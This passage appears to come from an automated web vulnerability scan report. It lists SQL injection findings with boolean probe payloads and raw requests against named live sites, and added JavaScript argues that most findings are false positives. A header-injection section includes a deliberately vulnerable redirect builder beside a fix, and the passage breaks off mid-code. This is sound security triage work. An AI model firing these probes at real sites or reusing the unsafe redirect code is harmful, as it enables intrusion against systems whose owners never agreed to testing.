29.83. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4

29.84. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4

29.85. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4

29.86. http://syn.5min.com/handlers/SenseHandler.ashx

29.87. http://trk.etrigue.com/track.php

29.88. http://visualstudiogallery.msdn.microsoft.com/85f0aa38-a8a8-4811-8b86-e7f0b8d8c71b/stats/RegisterPageView

29.89. http://web2.checkm8.com/adam/detect

29.90. http://widgets.klout.com/public/scripts/widget_hover.js

29.91. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-off.gif

29.92. http://wow.curse.com/Themes/Common/CS/images/Common/star-left-on.gif

29.93. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-off.gif

29.94. http://wow.curse.com/Themes/Common/CS/images/Common/star-right-on.gif

29.95. http://wow.curse.com/adserver/default.aspx

29.96. http://www.articleonepartners.com/images/favicon.ico

29.97. http://www.articleonepartners.com/images/ipwatchdog.png

29.98. http://www.asp.net/omniture/analyticsid.aspx

29.99. http://www.betabeat.com/wp-admin/admin-ajax.php

29.100. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php

29.101. https://www.capitalone.com/favicon.ico

29.102. http://www.codeplex.com/site/analyticsid.aspx

29.103. http://www.fiddler2.com/fiddler2/updatecheck.asp

29.104. http://www.jackhenry.com/logos/cdd775ef-7b5f-4921-bd1a-c577d8029e28.gif

29.105. http://www.jackhenrybanking.com/images/b7cf526e-2e5f-4898-9d62-3bb61fdd6dcf.gif

29.106. http://www.nmmlaw.com/favicon.ico

29.107. http://www.othersonline.com/favicon.ico

29.108. http://www.seashepherd.org/favicon.ico

29.109. http://www.silverlight.net/omniture/analyticsid

29.110. http://www.silverpop.com/de/images/headers/About_L3.jpg

29.111. http://www.silverpop.com/de/images/headers/Clients_L3.jpg

29.112. http://www.silverpop.com/de/images/headers/Impressum_L3.jpg

29.113. http://www.silverpop.com/de/images/headers/NewsEvents_L3.jpg

29.114. http://www.silverpop.com/de/images/headers/PrivacyLegal_L3.jpg

29.115. http://www.silverpop.com/de/images/headers/Resources_L3.jpg

29.116. http://www.silverpop.com/favicon.ico

29.117. http://www.silverpop.com/global/dropmenu/settings.js

29.118. http://www.silverpop.com/images/headers/Clients_L3.jpg

29.119. http://www.silverpop.com/images/headers/NewsEvents_L3.jpg

29.120. http://www.silverpop.com/images/headers/Partners_L3.jpg

29.121. http://www.silverpop.com/images/headers/Preferences_L3.jpg

29.122. http://www.silverpop.com/images/headers/PrivacyLegal_L3.jpg

29.123. http://www.silverpop.com/images/headers/Resources_L3.jpg

29.124. http://www.silverpop.com/images/headers/Services_L3.jpg

29.125. http://www.silverpop.com/images/headers/Sitemap_L3.jpg

29.126. http://www.silverpop.com/images/home/banners/Dreamforce.jpg

29.127. http://www.silverpop.com/images/home/banners/Lead-Management.jpg

29.128. http://www.silverpop.com/images/roles/banner_B2B-Marketer.jpg

29.129. http://www.silverpop.com/images/roles/banner_Email-Marketer.jpg

29.130. http://www.silverpop.com/images/roles/banner_agencies.jpg

29.131. http://www.silverpop.com/imx/gui_background.jpg

29.132. http://www.silverpop.com/preferences_sf/prepopulateFields.js.sp

30. Content type is not specified

30.1. http://ad.yieldmanager.com/st

30.2. http://greatponds.squarespace.com/favicon.ico

30.3. http://media.trafficmp.com/a/js

30.4. http://www.greatpondsma.org/favicon.ico

31. SSL certificate

31.1. https://code.google.com/

31.2. https://domsnitch.googlecode.com/

1. SQL injection
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://web2.checkm8.com/adam/detect [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://web2.checkm8.com
Path:   /adam/detect

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response 1

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:22 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.17 NY-AD7
Set-cookie: A=d1LS96wDHW31vc9HH6Mca;Path=/;
Set-cookie: C=oeMS96wzNNT9cdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 170777909/1244522061/3644782917/4000817842
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=haymarketmedia.SCMagazineUS&page=841619005377563&serial=1000:1:A&&LOC=http://www.scmagazineus.com/&WIDTH=1039&HEIGHT=733&WIDTH_RANGE=WR_D&DATE=01110722&HOUR=15&RES=RS21&ORD=43659126423120664&req=x&pos=004671820390295345&&&id=442705&click=http://ad.doubleclick.net/click%253Bh%253Dv8/3b4c/3/0/%252a/z%253B242418662%253B0-0%253B1%253B37430148%253B1412-640/480%253B42633033/42650820/1%253B%253B%257Esscs%253D%253f&ad_play=&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: web2.checkm8.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response 2

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:14:22 GMT
Server: Apache
P3P: policyref="http://web2.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.15 NY-AD5
Set-cookie: C=oeMS96wE8Z4ZcdadapHWOZGc;Path=/;Expires=Thu, 06-Dec-2074 23:47:42 GMT;
x-internal-browser: MZ17
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.web2.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 152987262/1226731317/3644782917/4000817842
x-internal-selected:
x-internal-no-count: ROBOT-OVERLOAD
x-internal-error: DUPLICATED REQUEST-SERIAL - PLEASE FIX ON SITE
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.2. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.betabeat.com
Path:   /wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11107432'%20or%201%3d1--%20 and 11107432'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content11107432'%20or%201%3d1--%20/themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:03 GMT
Server: VoxCAST
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content11107432' or 1=1-- /themes/nyo_tech/images
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content11107432'%20or%201%3d2--%20/themes/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:03 GMT
Server: VoxCAST
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content11107432' or 1=2-- /themes/nyo_tech/images
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.3. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.betabeat.com
Path:   /wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes'%20and%201%3d1--%20/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:04 GMT
Server: VoxCAST
Content-Length: 453
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/betabe
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes'%20and%201%3d2--%20/nyo_tech/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:04 GMT
Server: VoxCAST
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/betabe
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>
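
The check that settles this, as an added example (not part of the XSS.CX report): normalise the two responses above by dropping the per-request Date and Content-Length headers, replacing the echoed payload with a placeholder, and blanking the origin banner, then compare what is left. The RESPONSE_1 and RESPONSE_2 constants are transcribed from issue 1.3 (bodies cut where the report shows ...[SNIP]...); the TP_TRUE / TP_FALSE pair is constructed to show what a genuine boolean-based difference looks like, and all function names are this example's own.

```javascript
// Added triage helper for difference-based SQLi findings (not scanner code).

// Transcribed from Response 1 / Response 2 of issue 1.3, cut at ...[SNIP]...
const RESPONSE_1 = [
  'HTTP/1.1 410 Gone',
  'Date: Thu, 21 Jul 2011 16:15:04 GMT',
  'Server: VoxCAST',
  'Content-Length: 453',
  'Content-Type: text/html; charset=iso-8859-1',
  'X-Cache: MISS from VoxCAST',
  '',
  '<h1>Gone</h1>',
  "<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/betabe",
  '<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>',
].join('\r\n');

const RESPONSE_2 = [
  'HTTP/1.1 410 Gone',
  'Date: Thu, 21 Jul 2011 16:15:04 GMT',
  'Server: VoxCAST',
  'Content-Length: 472',
  'Content-Type: text/html; charset=iso-8859-1',
  'X-Cache: MISS from VoxCAST',
  '',
  '<h1>Gone</h1>',
  "<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/betabe",
  '<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>',
].join('\r\n');

// Decoded payloads exactly as they are echoed in the two bodies.
const PAYLOAD_TRUE = "' and 1=1-- ";
const PAYLOAD_FALSE = "' and 1=2-- ";

// Constructed pair: a real boolean-based difference, where the 1=2 condition
// empties the result set and nothing else about the response changes.
const TP_TRUE = 'HTTP/1.1 200 OK\r\nDate: a\r\nContent-Length: 24\r\n\r\n<li>betabeat.png (7)</li>';
const TP_FALSE = 'HTTP/1.1 200 OK\r\nDate: b\r\nContent-Length: 17\r\n\r\n<p>no results</p>';

function splitResponse(raw) {
  const i = raw.indexOf('\r\n\r\n');
  const head = i === -1 ? raw : raw.slice(0, i);
  const body = i === -1 ? '' : raw.slice(i + 4);
  const [statusLine, ...headers] = head.split('\r\n');
  return { statusLine, headers, body };
}

// Canonical form: drop headers that vary per request, replace the echoed
// payload (different by construction) and blank the Apache/PHP banner, which
// identifies the origin host that answered, not the outcome of any query.
function normalizeResponse(raw, payload) {
  const { statusLine, headers, body } = splitResponse(raw);
  const stableHeaders = headers.filter(h => !/^(Date|Content-Length):/i.test(h));
  const normBody = body
    .split(payload).join('{PAYLOAD}')
    .replace(/<address>[^<]*<\/address>/, '<address>{ORIGIN}</address>');
  return [statusLine, ...stableHeaders, '', normBody].join('\r\n');
}

// True only when something other than the volatile fields differs, i.e. when
// the boolean condition in the payload actually changed the response.
function differentialSuggestsSqli(rawTrue, payloadTrue, rawFalse, payloadFalse) {
  return normalizeResponse(rawTrue, payloadTrue) !== normalizeResponse(rawFalse, payloadFalse);
}

// How much of the raw Content-Length difference is just the server banner?
function explainLengthDelta(rawA, rawB) {
  const len = raw => { const m = /^Content-Length:\s*(\d+)/im.exec(raw); return m ? Number(m[1]) : 0; };
  const banner = raw => { const m = /<address>([^<]*)<\/address>/.exec(raw); return m ? m[1] : ''; };
  return {
    contentLengthDelta: len(rawB) - len(rawA),
    bannerDelta: banner(rawB).length - banner(rawA).length,
  };
}
```

For issue 1.3 differentialSuggestsSqli returns false and explainLengthDelta reports that all 19 bytes of the Content-Length difference are the banner; the same normalisation applied to issues 1.4 and 1.5 gives the same result. The constructed TP pair returns true, so the check is not simply discarding every finding.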

1.4. http://www.betabeat.com/wp-content/themes/nyo_tech/images/betabeat.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.betabeat.com
Path:   /wp-content/themes/nyo_tech/images/betabeat.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 20937989'%20or%201%3d1--%20 and 20937989'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way. As in 1.3, the responses below are both 410 Gone pages echoing the requested path, and the only difference is the Apache/PHP banner in the <address> line, which accounts for the whole 19-byte Content-Length difference (460 versus 479). This points to two different backend hosts behind the VoxCAST cache rather than to a SQL query, so the finding should be treated as a false positive unless a manual retest shows otherwise.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes/nyo_tech20937989'%20or%201%3d1--%20/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:05 GMT
Server: VoxCAST
Content-Length: 460
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=1-- /images
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.betabeat.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes/nyo_tech20937989'%20or%201%3d2--%20/images/betabeat.png?1309475579 HTTP/1.1
Host: www.betabeat.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.betabeat.com/wp-content/themes/nyo_tech/stylesheets/betabeat.css
Cookie: __gads=ID=235967ca9697d03d:T=1311264831:S=ALNI_MbPv2nK2cNxvePusrF38IHDK6OgBw

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:15:05 GMT
Server: VoxCAST
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes/nyo_tech20937989' or 1=2-- /images
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.betabeat.com Port 80</address>
</body></html>

1.5. http://www.observer.com/wp-content/themes/nyo_tech/images/observer.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.observer.com
Path:   /wp-content/themes/nyo_tech/images/observer.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way. The responses below show the same pattern as 1.3 and 1.4, with the two banners in the opposite order this time (Apache/2.2.9 with Suhosin answered the 1=1 request, Apache/2.2.3 the 1=2 request), and the 19-byte Content-Length difference (472 versus 453) is again exactly the banner. The difference comes from which origin host served the request, not from the injected condition.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /wp-content/themes'%20and%201%3d1--%20/nyo_tech/images/observer.png?1310084808 HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css
Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ

Response 1

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:13:55 GMT
Server: VoxCAST
Content-Length: 472
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=1-- /nyo_tech/images/observ
...[SNIP]...
<address>Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch Server at www.observer.com Port 80</address>
</body></html>

Request 2

GET /wp-content/themes'%20and%201%3d2--%20/nyo_tech/images/observer.png?1310084808 HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.observer.com/wp-content/themes/nyo_tech/stylesheets/observer.css
Cookie: __gads=ID=5f64fd7a7ab7d5d0:T=1311264759:S=ALNI_Mb3Is20dJdZM1lFiPbSft2ttJqrEQ

Response 2

HTTP/1.1 410 Gone
Date: Thu, 21 Jul 2011 16:13:55 GMT
Server: VoxCAST
Content-Length: 453
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from VoxCAST

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>410 Gone</title>
</head><body>
<h1>Gone</h1>
<p>The requested resource<br />/wp-content/themes' and 1=2-- /nyo_tech/images/observ
...[SNIP]...
<address>Apache/2.2.3 (Debian) PHP/5.2.0-8+etch13 Server at www.observer.com Port 80</address>
</body></html>

2. HTTP header injection
There are 4 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
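
The following is an added example (not DoubleClick's code) that reproduces the mechanism behind issues 2.1 to 2.4, where a URL-decoded path segment is concatenated into the Location header, and implements the allow-list check described in the remediation paragraph. STATIC_HOST and TAIL are taken from issue 2.1; the Set-Cookie payload is constructed to show that the same CRLF lets an attacker add a complete header of their own, and all function names are this example's own.

```javascript
// Added example: Location header splitting and the control-character check.
const STATIC_HOST = 'http://static.2mdn.net';               // redirect target seen in 2.1
const TAIL = 'x1.aud/capitalone/exclusion;sz=1x1;ord=1234567'; // rest of the 2.1 path

// Vulnerable pattern as observed: the decoded first path segment goes straight
// into Location, so %0d%0a in the request becomes a real CRLF in the response.
function buildRedirectUnsafe(restParam1, tail) {
  const location = `${STATIC_HOST}/${decodeURIComponent(restParam1)}/${tail}`;
  return [
    'HTTP/1.1 302 Moved Temporarily',
    'Content-Type: text/html',
    `Location: ${location}`,
    '',
    '<h1>Error 302 Moved Temporarily</h1>',
  ].join('\r\n');
}

// Remediation paragraph: reject every character below 0x20 (plus DEL). The
// check runs on the *decoded* value; testing the raw %-encoded string would
// never see the CR and LF that %0d%0a turns into.
function assertHeaderSafe(value) {
  if (/[\x00-\x1f\x7f]/.test(value)) {
    throw new Error('control character in header value: ' + JSON.stringify(value));
  }
  return value;
}

function buildRedirectSafe(restParam1, tail) {
  const segment = assertHeaderSafe(decodeURIComponent(restParam1));
  const location = `${STATIC_HOST}/${segment}/${assertHeaderSafe(tail)}`;
  return [
    'HTTP/1.1 302 Moved Temporarily',
    'Content-Type: text/html',
    `Location: ${location}`,
    '',
    '<h1>Error 302 Moved Temporarily</h1>',
  ].join('\r\n');
}

// What a browser or caching proxy sees: header lines are whatever sits between
// CRLFs before the blank line. A line without a colon is a malformed header.
function parseResponseHeaders(raw) {
  const end = raw.indexOf('\r\n\r\n');
  const head = end === -1 ? raw : raw.slice(0, end);
  return head.split('\r\n').slice(1).map(line => {
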